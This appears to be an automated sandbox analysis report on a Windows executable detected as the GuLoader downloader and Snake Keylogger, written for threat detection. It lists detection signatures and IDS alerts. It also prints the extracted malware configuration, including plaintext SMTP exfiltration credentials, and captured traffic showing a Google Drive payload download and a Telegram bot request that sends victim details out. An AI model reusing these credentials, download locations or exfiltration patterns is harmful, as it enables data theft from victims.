Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GBYfjUz4a5.exe

Overview

General Information

Sample name:GBYfjUz4a5.exe
renamed because original name is a hash value
Original sample name:3c7ce26361ffddf491732e53dbdb1d457dc651e3709a04dc36cfa751f4333f65.exe
Analysis ID:1632394
MD5:6f6a2f1350b0512ad0dd3d4a6e060f6c
SHA1:72287931c88f65da905ba186fd09963c3e773b5c
SHA256:3c7ce26361ffddf491732e53dbdb1d457dc651e3709a04dc36cfa751f4333f65
Tags:exeVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • GBYfjUz4a5.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\GBYfjUz4a5.exe" MD5: 6F6A2F1350B0512AD0DD3D4A6E060F6C)
    • GBYfjUz4a5.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\GBYfjUz4a5.exe" MD5: 6F6A2F1350B0512AD0DD3D4A6E060F6C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.1545029670.0000000005E90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: GBYfjUz4a5.exe PID: 6292JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: GBYfjUz4a5.exe PID: 7312JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: GBYfjUz4a5.exe PID: 7312JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:17:55.569283+010028033053Unknown Traffic192.168.2.649693104.21.96.1443TCP
            2025-03-07T23:18:04.930033+010028033053Unknown Traffic192.168.2.649699104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:17:50.067835+010028032742Potentially Bad Traffic192.168.2.649691132.226.247.7380TCP
            2025-03-07T23:17:53.239861+010028032742Potentially Bad Traffic192.168.2.649691132.226.247.7380TCP
            2025-03-07T23:17:56.364709+010028032742Potentially Bad Traffic192.168.2.649694132.226.247.7380TCP
            2025-03-07T23:17:59.396009+010028032742Potentially Bad Traffic192.168.2.649696132.226.247.7380TCP
            2025-03-07T23:18:02.645980+010028032742Potentially Bad Traffic192.168.2.649698132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:17:39.552256+010028032702Potentially Bad Traffic192.168.2.649689142.250.184.206443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:18:20.808335+010018100071Potentially Bad Traffic192.168.2.649708149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: GBYfjUz4a5.exeAvira: detected
            Found malware configuration
            Source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: GBYfjUz4a5.exeVirustotal: Detection: 67%Perma Link
            Source: GBYfjUz4a5.exeReversingLabs: Detection: 50%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA87A8 CryptUnprotectData,7_2_02DA87A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA8EF1 CryptUnprotectData,7_2_02DA8EF1
            Source: GBYfjUz4a5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49692 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.6:49689 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_0040276E FindFirstFileW,7_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_0040622B FindFirstFileW,FindClose,7_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02BDFC19h7_2_02BDF961
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02BDF45Dh7_2_02BDF2C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02BDF45Dh7_2_02BDF4AC
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA9280h7_2_02DA8FB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA7EB5h7_2_02DA7B78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA5179h7_2_02DA4ED0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA7571h7_2_02DA72C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAB15Fh7_2_02DAAE90
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAD14Fh7_2_02DACE80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA2151h7_2_02DA1EA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA1CF9h7_2_02DA1A50
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA4D21h7_2_02DA4A78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA7119h7_2_02DA6E70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAF13Fh7_2_02DAEE70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA6CC1h7_2_02DA6A18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAACCFh7_2_02DAAA00
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA48C9h7_2_02DA4620
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA5E81h7_2_02DA5BD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA9A8Fh7_2_02DA97C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAFA5Fh7_2_02DAF790
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA5A29h7_2_02DA5780
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA2E59h7_2_02DA2BB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DABA7Fh7_2_02DAB7B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DADA6Fh7_2_02DAD7A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA2A01h7_2_02DA2758
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAD5DFh7_2_02DAD310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA25A9h7_2_02DA2300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAF5CFh7_2_02DAF300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA55D1h7_2_02DA5328
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA79C9h7_2_02DA7720
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAB5EFh7_2_02DAB320
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAC39Fh7_2_02DAC0D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAE38Fh7_2_02DAE0C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA0B99h7_2_02DA08F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAA3AFh7_2_02DAA0E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA0741h7_2_02DA0498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA6733h7_2_02DA6488
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA9F1Fh7_2_02DA9C50
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA02E9h7_2_02DA0040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DABF0Fh7_2_02DABC40
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA3709h7_2_02DA3460
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA32B1h7_2_02DA3008
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA62D9h7_2_02DA6030
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DADEFFh7_2_02DADC30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA18A1h7_2_02DA15F8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DACCBFh7_2_02DAC9F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAECAFh7_2_02DAE9E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA1449h7_2_02DA11A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAE81Fh7_2_02DAE550
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DA0FF1h7_2_02DA0D48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAA83Fh7_2_02DAA570
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02DAC82Fh7_2_02DAC560
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E19180h7_2_02E18E88
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E14E90h7_2_02E14B98
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E147E8h7_2_02E14478
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E16B40h7_2_02E16848
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E19FD8h7_2_02E19CE0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E142B7h7_2_02E13FE8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1CAE0h7_2_02E1C7E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E15CE8h7_2_02E159F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1F5E8h7_2_02E1F2F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E122C7h7_2_02E11FF8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E187F0h7_2_02E184F8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E18CB8h7_2_02E189C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E13997h7_2_02E136C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1B7C0h7_2_02E1B4C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1E2C8h7_2_02E1DFD0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E119A7h7_2_02E116D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E174D0h7_2_02E171D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E17998h7_2_02E176A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E13078h7_2_02E12DA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1A4A0h7_2_02E1A1A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1CFA8h7_2_02E1CCB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E11087h7_2_02E10DB8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E161B0h7_2_02E15EB8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1FAB0h7_2_02E1F7B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E16678h7_2_02E16380
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E12757h7_2_02E12488
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1BC88h7_2_02E1B990
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E10767h7_2_02E10498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1E790h7_2_02E1E498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E15358h7_2_02E15060
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1EC59h7_2_02E1E960
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E11E37h7_2_02E11B68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E17E60h7_2_02E17B68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1A968h7_2_02E1A670
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1D470h7_2_02E1D178
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E102E7h7_2_02E10040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1D938h7_2_02E1D640
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E11517h7_2_02E11248
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E19648h7_2_02E19350
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E13E27h7_2_02E13B58
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1C150h7_2_02E1BE58
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1C618h7_2_02E1C320
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E10BF7h7_2_02E10928
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E15820h7_2_02E15528
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1F120h7_2_02E1EE28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E18328h7_2_02E18030
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E13507h7_2_02E13238
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1AE30h7_2_02E1AB38
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1B2F8h7_2_02E1B000
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E1DE00h7_2_02E1DB08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E17008h7_2_02E16D10
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E12BE7h7_2_02E12918
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E19B10h7_2_02E19818
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_02E3F228
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_02E3F21E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_02E3F53E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E40800h7_2_02E40508
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 02E40338h7_2_02E40040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_02E72A80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_02E72A70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD3308h7_2_35CD2EF0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD2D41h7_2_35CD2A90
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDD069h7_2_35CDCDC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDFBD9h7_2_35CDF930
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDF781h7_2_35CDF4D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDF329h7_2_35CDF080
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_35CD0040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_35CD0853
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDEED1h7_2_35CDEC28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDEA79h7_2_35CDE7D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDE621h7_2_35CDE378
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDE1C9h7_2_35CDDF20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD0D0Dh7_2_35CD0B30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD16F8h7_2_35CD0B30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDDD71h7_2_35CDDAC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD3308h7_2_35CD2EEA
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDD919h7_2_35CDD670
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_35CD0673
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CDD4C1h7_2_35CDD218
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 4x nop then jmp 35CD3308h7_2_35CD3236

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49708 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2022:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49698 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49694 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49691 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49693 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49689 -> 142.250.184.206:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49699 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
